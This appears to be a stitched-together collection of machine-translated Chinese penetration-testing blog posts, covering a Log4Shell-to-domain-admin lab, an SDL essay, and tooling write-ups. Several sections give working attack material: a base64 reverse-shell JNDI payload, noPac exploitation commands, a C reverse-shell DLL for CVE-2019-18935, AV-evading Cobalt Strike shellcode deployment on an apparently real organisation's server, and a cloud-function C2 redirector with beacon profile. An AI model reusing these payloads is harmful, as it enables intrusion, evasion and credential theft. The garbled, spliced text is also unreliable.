UKhackteam

Network Topology Information Collection The first step in penetration testing is of course information collection Get IP192.168.81.151, we first use nmap to scan the regular TCP port. nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151 Found that the two ports 22,38080 are open Through nmap, we can know that this is an Ubuntu, 22 is ssh, and the port 38080 is unknown. Let's try to access it. So I tried the latest new vulnerability CVE-2021-44228 to see if I can get dnslog Found a CVE-2021-44228 vulnerability, try to get a shell CVE-2021-44228 Utilization First enable an LDAP in our VPS kali(192.168.81.133): git clone https://github.com/black9/Log4shell_JNDIExploit.git java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133 Then listen on 9999 port on kali: We use TOMCATBYpass for rebound shell /bin/bash -i /dev/tcp/192.168.210.23/9999 01 -Bounce shell The rebound shell command requires base64 encoding BP packet capture, change to post parameter transmission and construct payload payload=${jndi:ldap://192.168.81.13:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzMy85OTk5IDA+JjE=} Finally, using EXP to successfully rebound the shell. You must perform url encoding twice for base64 encoding to execute I found that the shell I got is a docker container I failed to find a way to escape, and finally found the flag file in the /root/directory: flag{redteam.lab-1}Congratulations, you got this: saul Saul123 I got a flag, and something similar to the account password During information collection, nmap scans to the target host to open 22ssh service, so think about the account password that may be ssh Intranet information collection Log in to Ubuntu system through the account and password obtained in the previous section We can see that the current machine has two network cards, one ens33 is used to link the external network, and the other ens38 is used to communicate intranet In actual intranet penetration: if the intranet penetration is in the Linux environment, try to form all bash and pythonization, because Linux is completely built, while intranet penetration under Windows try to form all powershell, bat and vbs. Try not to rely too much on external tools. So we use the for loop to ping the C-segment network of Ens38 for i in 10.0.1.{1.254}; do if ping -c 3 -w 3 $i /dev/null; then echo $i Find the target; fi; done I found that there is another machine 10.0.1.7 on the intranet Or use scan info tool to collect intranet information Quickly build httpd using python in Kali Target machine download tool and grant permissions Collect intranet information 10.0.1.7 was found to survive and existed with MS17-010 Then for convenience, I chose to use frp to proxy the traffic of the current machine: Configure frps.ini Configure frpc.ini Then use Metasploit to set up Socks5 to collect in-depth information on the intranet; setg Proxies socks5:192.168.81.13:8888setg ReverseAllowProxy true Use the smb version detection module to scan the target: use auxiliary/scanner/smb/smb_version It was found that the target version 10.0.1.7 is Windows 7 and the domain REDTEAM exists. Since it is Windows 7, there may be a MS17-010 vulnerability MS17-010 Utilization Through the previous section, we know that 10.0.1.7 is win7, and then we will conduct the detection. Through detection, we found out that there is an ms17-010 vulnerability on this machine. Since the target is that the intranet does not necessarily leave the network, the tcp reflective connection cannot be used. Set to payload forward bind_tcp Get win7 permissions directly, then load mimikataz to grab the password Username Domain Password root REDTEAM Red12345meterpreter load mimikatz loading tool meterpreter creds_all lists creds Note that the command is to grab the password from memory, the original state of the shooting range is paused and restored. If you restart, you need to log in to win7 once. At this time, I got the account of a domain user. Intranet weapon CVE-2021-42287, CVE-2021-42278 After collecting information on the current intranet, it was found that win7 also has an intranet network card. And the IP address to domain control to domain control is 10.0.0.12 Since two domain vulnerabilities have recently been exposed: CVE-2021-42287 and CVE-2021-42278, try to exploit them directly. The specific principle is: if there is a domain control name DC in the domain (the machine user corresponding to the domain control is DC), the attacker uses vulnerability CVE-2021-42287 to create a machine user saulGoodman, and then changes the sAMAccountName of the machine user saulGoodman to DC. Then use DC to apply for a TGT bill. Then change the DC sAMAccountName to sAMAccountName. At this time, KDC will determine that there is no DC and this user in the domain, and will automatically search for DC (DC is the sAMAccountName of the domain controlled DC already in the domain). The attacker uses the TGT he just applied for to S4U2self, simulates the domain manager in the domain to request the ST ticket of the domain controlled DC, and finally obtains the permissions of the domain controller DC. So use MSF to add a socks5 Add a route run autoroute -s 10.0.0.7/24 Then we just add the local proxy Download the address using the tool https://github.com/WazeHell/sam-the-admin https://github.com/Ridter/noPac https://github.com/waterrr/noPac Then use the script proxychains python3 sam_the_admin.py 'redteam.lab/root:Red12345' -dc-ip 10.0.0.12 -shell proxychains python noPac.py redteam.lab/root:'Red12345' -dc-ip 10.0.0.12 -shell --impersonate administrator -use-ldapproxychains python3 exp.py 'redteam/root:Red12345' -dc-ip 10.0.0.12 -shell Finally, I got the final flag. Target machine environment: Link : https://pan.baidu.com/s/18pXdC2f_zDsXONpSUg1fYg Extraction code : 8dcy Original link: http://www.kryst4l.cn/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-log4j2-RCE-%E5%86%8D%E5%88%B0%E5%86%85%E7%BD%91%E6%A0%B8%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%B4%9E-CVE-2021-42287%E3%80%81CVE-2021-42278-%E6%8B%BF%E5%88%B0-DC/

1. Preface Generally, safety belongs to the operation and maintenance department. I talked with the operation and maintenance director of the previous company about whether some daily safety work can be integrated into DevOps. Not long after, I left for various reasons. In May, he joined a third-party payment company in 2018 and spent various inspections in the first half of the year. The regulatory situation was severe and the major leaders attached importance to safety (mainly supervision), and the goals of all departments in 2019 are linked to safety. Since payment companies need to face inspections from various regulatory agencies, some security has been done relatively well. After nearly a year of familiarity with the company, it has been found that the application security is relatively weak. This part of the better solution in the industry is SDL. After communicating with various manufacturers, I decided to promote it bit by bit in the company. The above picture shows the standard version of SDL. Since the operation and maintenance adopts the DevOps system, the test also uses automation for functional testing. The version iteration cycle is relatively fast, the security staff is insufficient, and the threat modeling of SDL is also confused. If safety is added to the entire process, it will seriously affect the delivery time. In this case, some practices in the industry were investigated and decided to simplify SDL. The simplified version of SDL is as follows: . 2. Lite SDL implementation practice Safety Training One of the core SDL is security training, so in terms of security training, we have done security coding, security awareness, security knowledge base, and security SDK Safety code: We found some Java security coding specifications, product security design and development security specifications online, combined with the company's actual business, and released a version. Because various regulatory agencies have requirements for training, they have introduced safety training and regularly trained for development and new employee recruitment. Safety Awareness: The company has a WeChat official account for the enterprise, and most employees have followed it and promoted it on the official account. After the promotion is completed, please give me a small gift Because of insufficient staff, functional testing and safety testing are essentially in common, the testing department is also relatively cooperative and has conducted some safety testing-related training for testers, but the effect is not very ideal. Safety Knowledge Base: During the vulnerability repair process, many developments do not understand the principles and repair solutions, so we have established a security knowledge base and first go to the security knowledge base to check related solutions. If you cannot find it, communicate with the security personnel, and the security personnel will constantly update the knowledge base to form a closed loop. Security SDK Since the company has an architecture department, the development framework is basically provided by the architecture department. After we communicated some common vulnerabilities with the architecture department, we let the architecture implement some vulnerability repair methods using SDK. Development only requires importing the JAR package and configuring it in the configuration file. There are also many pitfalls and need to be optimized slowly. 3. Safety requirements design The company has a project approval system, and all project approvals need to be established through the system. Safety is a must-have, and the safety of the review meeting must also be participated in. At this time, the project manager will basically contact the security personnel to communicate, copy a VIP product safety design specification, and determine the security needs based on the requirements documents and the project manager. After confirming the security requirements, it will be added to the requirements document as required and confirm the security testing time. This process is only for new projects. The requirements of projects that have been launched do not follow this process. In the subsequent security testing, we will talk about how this part of the project is done. IV. Development, security testing Security testing is mainly divided into code audit, vulnerability scanning, and manual security testing. The safety products derived from this are divided into three categories. DAST: Dynamic application security test (wvs, appscan), SAST: static application security test (fortify,rips), IAST: interactive application security test (seeker, Lijian). For detailed introductions of these three products, please refer to https://www.aqniu.com/learn/46910.html. The figure below is a comparison of the test results of the three products. These types of products can be automated and can be inherited into DevOps. Next we incorporate these tools into the development testing phase. There are many implementation modes of IAST, common ones include proxy mode, VPN, traffic mirroring, and instrumentation mode. This article introduces the two most representative modes, proxy mode and instrumentation mode. Some of the products surveyed are shown in the figure below, and the specific test results will not be announced. Development Stage When investigating several types of products, IAST's instrumentation mode can be placed directly in the development environment. The main difference between the code between the development environment and the test environment is the application.yml configuration file, so this mode can be placed in the development stage in advance. When the development has finished writing the code and submit it to gitlab to deploy it to the development environment and start the application, the development needs to verify whether the function is available, and at this time, it can detect whether there are vulnerabilities. The company uses rancher in the test environment, puts the IAST jar package into the project's gitlab, pulls the code locally during deployment, and adds the jar package to the container by modifying the Dockerfile file. ADD shell/xxx.jar /home/app/xx/lib Since the company's projects basically use spring-boot, all projects start the application through a start.sh script. Start.sh and Dockerfile need to be added to the project's gitlab, and modify the start.sh script file at the same time. -javaagent:$APP_HOME/lib/xx.jar -jar $APP_HOME/app/*.jar --spring.profiles.active=dev $APP_HOME/logs/startup.log 21 The test items are as follows, typos are ignored: After the development and submission code is deployed, access the normal functions and you can see whether there are vulnerabilities on the platform. Some products will also detect third-party component packages. The company uses harbor to mirror the image as a warehouse. After the project is deployed, it will be packaged into a mirror and uploaded to harbor. Harbor comes with a mirror scanning function. Testing Phase After the development is completed, it enters the testing stage. In this stage, we conduct static code scanning, functional testing, and security testing. Static code scanning Use the static code scanning tool to scan the code before compilation and find various problems at the static code level, including security issues. Some tools list Static code scanning We use sonarQube integration, we use FindbugSecurity, streamlined rules, and then perform static code bugs and secure scanning during the continuous construction process. While scanning static code, third-party dependency packages can also be scanned. OWSAP's Dependency-Check can be integrated into the continuous construction process. Since IAST-class products support this function, I will not introduce it. Functional Test In terms of functional testing, the company's testing department has implemented an automated test platform. In the early stage, we did not use agent detection. At the beginning, we used open source gourdscan plus openrasp, and used the default openrasp to enable non-intercept mode and vulnerability record function to detect vulnerabilities that are not returned on the server. Just configure the proxy IP on the automation platform: openrasp vulnerability record Later, the test reported that there was too much dirty data scan and the effect was not very good, so I gave up this plan. IAST's instrumentation method is used in the development stage, and the test environment also uses agents to detect problems in the same way as the development environment. After the functional test is completed. Since testers do not understand the vulnerability very much, the specified process is for testers to go to the platform to view reports and security personnel to communicate about which problems need to be fixed, and then write the problems to the test report Safety Test Security has been added to the entire process during the testing phase. All requirements changes need to be completed and functional tests are required, that is, all processes have passed the security test. In this way, the security staff is not very sufficient. It is decided to use the method of distinguishing internal and external services to determine whether security personnel are needed to intervene. Vulnerability Management Vulnerability Management has formulated a vulnerability management system, and the vulnerabilities are rated according to the degree of impact. Serious vulnerabilities must be corrected before they can be launched. High, medium and low-risk vulnerabilities have a small impact and need to be scheduled. Security personnel regularly track the vulnerability repair situation. V. Monitoring Payment companies generally have security equipment. This part basically uses the syslog of the device to the log center to visualize it, and customize the corresponding rules to achieve alarms. VI. Conclusion Personal knowledge and experience are not very familiar with the SDL system and have no experience, so they can only reach the current level. There are many places to optimize and add processes in the future. If you have any good suggestions, please feel free to communicate Source: https://xz.aliyun.com/t/5656

Some loopholes have been dug recently. Although it has been repeated, it has reference value. Let me share it with you here. It is still very uncomfortable to repeat the loopholes. When you think about it, life is never satisfactory. Repeating loopholes does not mean failure. It is important to come first and then come, and the order of appearance is important. 1. A certain site rce ignores the reason : is not in the scope Author priest me Thanks to the priest for taking me to test the domain name :https://***.***:8089/ CVE-2017-11357 CVE-2019-18935 CVE-2017-9248 vulnerability exists Vulnerability Exploit Download Address : https://github.com/noperator/CVE-2019-18935 https://github.com/noperator/CVE-2019-18935.git Delay 11s:sleep 11s: Test code : test.c #include windows.h #include stdio.h BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if (fdwReason==DLL_PROCESS_ATTACH) //Sleep(10000); //Time interval in millionseconds. Sleep(11000); return TRUE; } test.c compiles to amd642.dll file Run :python CVE-2019-18935.py -v 2017.1.228 -p payloads\amd642.dll -u https://***.****:8089/Telerik.Web.UI.WebResource.axd?type=rau The first step is to verify successfully, the success delay is about 11s, the original request is 2s Test command execution : #include windows.h #include stdio.h BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if (fdwReason==DLL_PROCESS_ATTACH) system('cmd.exe /c nslookup rsmwe.dnslog.cn'); system('cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net'); return TRUE; }test.c compiles to amd642.dll file Run again to view dnslog: Direct rebound shell, general exp: #include winsock2.h #include stdio.h #include windows.h #pragma comment(lib, 'ws2_32') #define HOST '{vps ip}' #define PORT {port} WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; char aip_addr[16]; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; //Adapted from https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c void ReverseShell() { WSAStartup(MAKEWORD(2, 2), wsaData); Winsock=WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); struct hostent *host=gethostbyname(HOST); strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host-h_addr))); hax.sin_family=AF_INET; hax.sin_port=htons(PORT); hax.sin_addr.s_addr=inet_addr(aip_addr); WSAConnect(Winsock, (SOCKADDR*)hax, sizeof(hax), NULL, NULL, NULL, NULL, NULL); if (WSAGetLastError()==0) { memset(ini_processo, 0, sizeof(ini_processo)); ini_processo.cb=sizeof(ini_processo); ini_processo.dwFlags=STARTF_USESTDHANDLES; ini_processo.hStdInput=ini_processo.hStdOutput=ini_processo.hStdError=(HANDLE)Winsock; char *myArray[4]={ 'cm', 'd.e', 'x', 'e' }; char command[8]=''; snprintf(command, sizeof(command), '%s%s%s', myArray[0], myArray[1], myArray[2], myArray[3]); CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, ini_processo, processo_info); } } DWORD WINAPI MainThread(LPVOID lpParam) { ReverseShell(); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { HANDLE hThread; if (fdwReason==DLL_PROCESS_ATTACH) hThread=CreateThread(0, 0, MainThread, 0, 0, 0); return TRUE; } The permissions are not low, it is the domain user : 2. SQL injection : Background introduction : A friend sent an injection. This injection is quite tricky. There is a waf of xx cloud, and the backend filters commas, odd and double quotes, and regular functions. My idea is very simple, hexadecimal. Just regexp function, I think there should be other ideas. (case+when+current_user+regexp+0x*+then+1+else+2*1e308+end) This way, the database user is created. Here I want to talk about the case when statement. The case when statement is much more flexible than we imagined. Here I will take a note and talk about : The most common : Say something unusual, I write two demos, and I can keep going to do it : case 1=1 when 2=2 then 1=1 else 1/0 end 3.url jump + identity authentication token leak : I dug it last night, and the reason I ignore is duplicate. Sometimes I am quite speechless to some manufacturers, and the vulnerabilities are there and they are not fixed. It gave me an illusion, found a loophole, and had the illusion of stepping on a honeypot. The asset range is :vc-*.xxx.com Actually, I am quite happy to encounter this range because I can make a simple fuzz, and I found a lot of assets. Open one by one and watch, visit :vc-ss.xxx.com, visit the site, and jump directly to ask for login. I am not a god, and I don’t have an account either. I looked at js and found no access to path information. Starting with fuzz, it’s easy to do if you know it’s php. Use ffuf to run the php/api dictionary and run to an interface development document /api/***.html The original intention of the interface development document is good, but the screenshot information/interface information on most interface development documents may be at risk of secondary vulnerability exploitation. Although the screenshot information is all plain text, unfortunately after testing, I found that almost all interfaces have direct access to 401, and identity authentication is required. I was a little helpless. When I wanted to give up, I always told myself to persist and read carefully after reading. I continued to stare at the interface document and kept flipping around and found an identity token leak and some other security vulnerabilities. I submitted the loophole and received a duplicate message in the morning : Original link: https://www.cnblogs.com/piaomiaohongchen/p/17130283.html

0x01 Introduction This is a burp plug-in for collection of Outlook user information. You can use this after you have logged into your Outlook account. The plug-in automatically crawls all contact information 0x02 Installation Just load the jar in the burp extension panel 0x03 Function introduction 1.All Users After loading the plug-in, enter the Outlook contact panel and click All Users Proxy - HTTP history filter api interface in burp /owa/service.svc?action=FindPeopleapp=People Select the request and right-click the menu Extensions - OutLook information collection - Do OoutLook Email scan Scan progress will be displayed in Extender - Extensions - OutLook information collection - Output The plug-in will automatically crawl all packets and generate a directory tree, which can view each request response package. Right-clicking the request will bring up the right-click menu and select Get all user emails to get all emails. 2. Note This API will have a large number of the same URLs and different Post submission parameters. If you select the wrong API interface, there will be a pop-up prompt. 3.Contact Information All packets of All Users must be loaded to use normally. The contact information is based on the All Users packet information. If the first step is not performed, there will be a pop-up reminder. Proxy - HTTP history filter api interface in burp /owa/service.svc?action=GetPersonaapp=People Select the request and right-click the menu Extensions - OutLook information collection - Do OoutLook Email scan Scan progress will be displayed in Extender - Extensions - OutLook information collection - Output The plug-in will automatically crawl all packets and generate a directory tree, which can view each request response package. Right-clicking the request will bring up the right-click menu and select Get All User personal information to obtain all contact information. Tools to obtain: Official account reply keyword "OutLook"

Tool Preparation jexboss Kali Linux CS 4.3 Windows Killer Online Query One Windows Killer Online Query Two Windows Killer Online Query Three fscan Tide shellcode free kill LSTAR Other plugins for CobaltStrike PEASS-ng PrintSpoofer Outdoor Internet Service 1. In order to practice the horizontal direction of the intranet, quietly focus on foreign sites 2. Found that there is a deserialization vulnerability in the jboss website. Yes, jexboss cannot be used successfully. python jexboss.py -u https://xx.xx.xx/3. Ultimate testing tool for deserialization by 6 brother successfully utilized 4. Check the current user whoami, ordinary user 5. Check IP address ipconfig 6. Check whether there is a killer tasklist /svc 7. Paste the query content into Windows Killing Soft Online Query and find that there is Killing Soft 8. Check whether the server is out of the network ping www.baidu.com, it is very good. The server is out of the network CS is online 1. Because there is a soft-killing software, we need to consider bypassing it. It is definitely not possible to upload CS Trojan directly. This time, the tide shellcode is not killed, because many exe files packaged using python on github are too large and uploaded very slowly, while the tide shellcode is not killed, and the upload is faster. 2. CS becomes a shellcode in C language 3. Copy the shellcode content to the tidal website, upload the generated exe to the target machine, and then execute the command C:\\usr\\desarrollo\\jboss-5.1.0.GA\\server\\sigAmeServer\\deploy\\ROOT.war\\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide 4. CS is successfully launched Permission enhancement Information Collection 1. View the current user and privileges Whoami whoami /priv 2. View system version and patch information systeminfo Nombre de host: AMEPROWEBEGAD Nombre del sistema operatingvo: Microsoft Windows 10 Pro Versi¢n del sistema operativo: 10.0.19044 N/D Compilaci¢n 19044 Fabricante del sistema operatingvo: Microsoft Corporation Configuraci¢n del sistema operativo: Estaci¢n de trabajo miembro Tipo de compilaci¢n del sistema operativo: Multiprocessor Free Propiedad de: appzusr Organizaci¢n registrada: Id. del producto: 00331-10000-00001-AA727 Fecha de instalaci¢n original: 13/5/2022, 14:03:47 Tiempo de arranque del sistema: 1/2/2023, 16:50:29 Fabricante del sistema: VMware, Inc. Modelo el sistema: VMware Virtual Platform Tipo de sistema: x64-based PC Procesador(es): 2 Procesadores instalados. [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz Versi¢n del BIOS: Phoenix Technologies LTD 6.00, 12/11/2020 Directorio de Windows: C:\Windows Directorio de sistema: C:\Windows\system32 Dispositivo de arranque: \Device\HarddiskVolume1 Configuraci¢n regional del sistema: ezs-mx;Espa¤ol (M‚xico) Idioma de entrada: es-mx;Espa¤ol (M‚xico) Zona horaria: (UTC-06:00) Guadalajara, Ciudad de M‚xico, Monterrey Cantidad total de memoria f¡ sica: 4.095 MB Memoria f¡ sica disponible: 1.201 MB Memoria virtual: tama¤o m ximo: 4.799 MB Memoria virtual: disponible: 1.147 MB Memoria virtual: en uso: 3.652 MB Ubicaci¢n(es) de archivo de paginaci¢n: C:\pagefile.sys Dominio: ame.local Servidor de inicio de sesi¢n: \\AMEPROWEBEGAD Revisi¢n(es): 4 revisi¢n(es) instaladas. [01]: KB5004331 [02]: KB5003791 [03]: KB5006670 [04]: KB5005699 Tarjeta(s) de red: 1 Tarjetas de interfaz de red instaladas. z [01]: Intel(R) PRO/1000 MT Network Connection Nombre de conexi¢n: Ethernet0 DHCP habilitado: No Direcciones IP [01]: 172.16.2.100 [02]: fe80:591:ae09:eee1:888e Requires Hyper-V: Se detect¢ un hippervisor. No se mostr n las caracter¡ sticas necessary para Hyper-V.3, view open port service netstat -ano Conexiones activas Proto Direcci¢n local Direcci¢n remota Estado PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 600 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1090 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:1098 0.0.0.0:0 LISTENING 7600 TCP z 0.0.0.0:1099 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1072 TCP 0.0.0.0:3873 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:4445 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:4446 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:4457 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:4712 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:4713 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6652 TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:7070 0.0.0.0:0 LISTENING 3564 TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:8080 0.0.0.0:0 z LISTENING 7600 TCP 0.0.0.0:8083 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:46305 0.0.0.0:0 LISTENING 7600 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 832 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 680 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1416 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1612 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2452 TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 832 TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 3404 TCP 0.0.0.0:49704 0.0.0.0:0 LISTENING 820 TCP 0.0.0.0:49708 0.0.0.0:0 LISTENING 3048 TCP 0.0.0.0:51407 0.0.0.0:0 LISTENING 7600 TCP 127z.0.0.1:5140 0.0.0.0:0 LISTENING 7172 TCP 127.0.0.1:51411 0.0.0.0:0 LISTENING 7600 TCP 172.16.2.100:139 0.0.0.0:0 LISTENING 4 TCP 172.16.2.100:8080 172.16.12.34:42602 TIME_WAIT 0 TCP 172.16.2.100:8080 172.16.12.34:42610 ESTABLISHED 7600 TCP 172.16.2.100:8080 172.16.12.34:55672 TIME_WAIT 0 TCP 172.16.2.100:8080 172.16.12.34:55686 TIME_WAIT 0 TCP 172.16.2.100:49717 38.90.226.62:8883 ESTABLISHED 3576 TCP 172.16.2.100:50848 172.16.2.100:51407 TIME_WAIT 0 TCP 172.16.2.100:51413 172.16.2.190:1433 ESTABLISHED 7600 TCP 172.16.2.100:51447 172.16.2.190:1433 ESTABLISHED 7600 TCP 172.16.2.100:56063 172.16.2.11:2222 ESTABLISHED 3576 TCP 172.16.2.100:56538 92.223.66.48:443 ESTABLISHED 3564 TCP [:]:135 [:]:0 LISTENINzG 600 TCP [:]:445 [:]:0 LISTENING 4 TCP [:]:1090 [:]:0 LISTENING 7600 TCP [:]:1098 [:]:0 LISTENING 7600 TCP [:]:1099 [:]:0 LISTENING 7600 TCP [:]:3389 [:]:0 LISTENING 1072 TCP [:]:3873 [:]:0 LISTENING 7600 TCP [:]:4444 [:]:0 LISTENING 7600 TCP [:]:4445 [:]:0 LISTENING 7600 TCP [:]:4446 [:]:0 LISTENING 7600 TCP [:]:4457 [:]:0 LISTENING 7600 TCP [:]:4712 [:]:0 LISTENING 7600 TCP [:]:4713 [:]:0 LISTENING 7600 TCP [:]:5985

First, we need to log in to Tencent Cloud and enable cloud functions. After logging in to Tencent Cloud, search for cloud functions. Just open it. First login, authorization is required. After logging into the console, click Create. The function name is free, choose to start from scratch, fill in Python 3.6 in the environment, pull down after selecting, and put the code inside. Copy the following code and modify the server address. # coding: utf8 import json,requests,base64 def main_handler(event, context): response={} path=None headers=None try: C2='http://43.134.164.72:80' if 'path' in event.keys(): path=event['path'] if 'headers' in event.keys(): headers=event['headers'] if 'httpMethod' in event.keys() and event['httpMethod']=='GET' : resp=requests.get(C2+path,headers=headers,verify=False) else: resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False) print(resp.headers) print(resp.content) response={ 'isBase64Encoded': True, 'statusCode': resp.status_code, 'headers': dict(resp.headers), 'body': str(base64.b64encode(resp.content))[2:-1] } except Exception as e: print('error') print(e) Finally: Return response When finished, click Save! Then click Trigger Management to create a trigger The format is as follows Click the API name to edit it and arrive at this page. The path is modified to / Click to publish service after completion Added the profile file of C2, named win_tecent_cloud_func.profile set sample_name 't'; set sleeptime '3000'; set jitter '0'; set maxdns '255'; set useragent 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)'; http-get { set uri '/api/x'; client { header 'Accept' '*/*'; metadata { base64; prepend 'SESSIONID='; header 'Cookie'; } } server { header 'Content-Type' 'application/ocsp-response'; header 'content-transfer-encoding' 'binary'; header 'Server' 'Nodejs'; output { base64; print; } } } http-stager { set uri_x86 '/vue.min.js'; set uri_x64 '/bootstrap-2.min.js'; } http-post { set uri '/api/y'; client { header 'Accept' '*/*'; id { base64; prepend 'JSESSION='; header 'Cookie'; } output { base64; print; } } server { header 'Content-Type' 'application/ocsp-response'; header 'content-transfer-encoding' 'binary'; header 'Connection' 'keep-alive'; output { base64; print; } } } After saving, store it in the cs directory. Start the cs server ./teamserver vpsip admin12345 win_tecent_cloud_func.profile Fill in the public network interface address domain name of the cloud function into the listener's http hosts and the stager's hosts Be careful not to http and 80 Add listening It was successfully launched after generating the shell. Original text connection: https://blog.bbskali.cn/3771.html

Preface I saw a discussion about the site separation type of site, and I would like to summarize the tips for information collection. Text There is no summary article on the website library separation type site yet, so I want to try to record the penetration ideas about the website library separation type site. For the site library separation type site, you can usually have two penetration entry points : 1.web website 2. The idea of database penetration is actually quite conventional. But here if the two entry points are nothing more than two paths. Intranet penetration is made from the web website and separated from the site database, intranet penetration is made from the database and separated from the site database, intranet penetration is made from the web website and separated from the site database, intranet penetration is customized to different penetration test plans according to different paths. The following records the process and easy problems. 1. Infiltration from the web entrance From the web portal, you usually getshell through various vulnerabilities in the website, such as file upload, command execution, code execution, and SQL injection writing (into outfile, log backup, etc.). When obtaining web permissions or having vulnerabilities such as file reading, we also read the database configuration file, analyze the database content, find database backups, and then penetrate the database target ip for subsequent operations. 2. Infiltration from the database entrance But here we have to say that the database entry point weak password exposed by the external network; web website SQL injection. Penetration from the database entrance is also mainly to obtain greater permissions or to expand our penetration results. For example, you can obtain some password information, usernames, etc. from the database, which can effectively help us in subsequent intranet penetration. The site is separated from the site library, and the database and the web are not on the same server. At this time, you cannot write a sentence to connect through the web, because the path is useless. If it is SQL injection found from the web side, you can collect information and obtain permissions through the following methods. 1.MYSQL (1) Positioning the web side ip address You can check the current connection status of MYSQL by querying PROCESSLIST in the information_schema library. Because the web application will generate query database operations, the target's ip:port will be brought back in the echoed host field. select * from information_schema.PROCESSLIST; After getting the IP of the web end, we can penetrate the web end. (2) load_file () Get sensitive information about the server where the database is located If there is no limit on the secure_file_priv parameter (MySQL5.7 below), we can also use the load_file() function to read the file content. select load_file('C:/test.txt');#left slash/ can also obtain network card information, such as reading: /etc/udev/rules.d/70-persistent-net.rules get the network card name. /etc/sysconfig/network-scripts/ifcfg-Netcard static IPDHCP if /var/lib/dhclient/dhclient--Netcard.lease 2.MSSQL (1) Determine whether the station library is separated Get the client host name select host_name(); Get the server host name select @@servername; Judging whether it is separated based on the results, the same result may be the same as the server, and the same result is the separation of the site library. (2) Stored procedure execution commands We can execute system commands through MSSQL stored procedures, and we can try to directly escalate permissions and penetrate other hosts. Two commonly used: XP_CMDSHELLSP_OACREATE can detect whether the database server is out of the network, and check whether it is out of the network by executing ping or curl. Usually when we encounter MSSQL, we will go online directly through command execution. It is also a database, so naturally there is some sensitive information in it. In order to further penetrate, you can organize the password book or other information.

Overview By replacing the authentication information and comparing the packet results, we can determine whether there is an overdue vulnerability in the interface. Features Supports HTTPS automatic filtering of static content such as picture/js/css/html pages, avoid blocking, support output reports and complete URLs, requests, and responses Installation and use Installation Dependencies git clone https://github.com/y1nglamore/IDOR_detect_tool.gitpython3 -m pip install -r requirements.txt Start python3 start.py You can listen to socks5://127.0.0.1:8889. Installation Certificate Use SwitchOmega and other plug-ins to connect to the agent, and visit mitm.it to enter the certificate installation page and install the certificate according to the operating system. Take MacOS as an example: After downloading and installing, open the keychain access, find the mitmproxy certificate, and modify it to alwaysstrus Detection of vulnerabilities First prepare the two accounts A and B of the target system, configure the A account information config/config.yml according to the system's authentication logic (cookie, header, parameters, etc.), and then log in to the B account Access using account B, the script will automatically replace the authentication information and playback, and determine whether there is an overdue vulnerability based on the response result. Generate a report Every time there is a new vulnerability, it will be automatically added to the report/result.html and open it through the browser: Click on the specific entry to expand/collapse the corresponding request and response: Detection logic Original connection: https://github.com/y1nglamore/IDOR_detect_tool

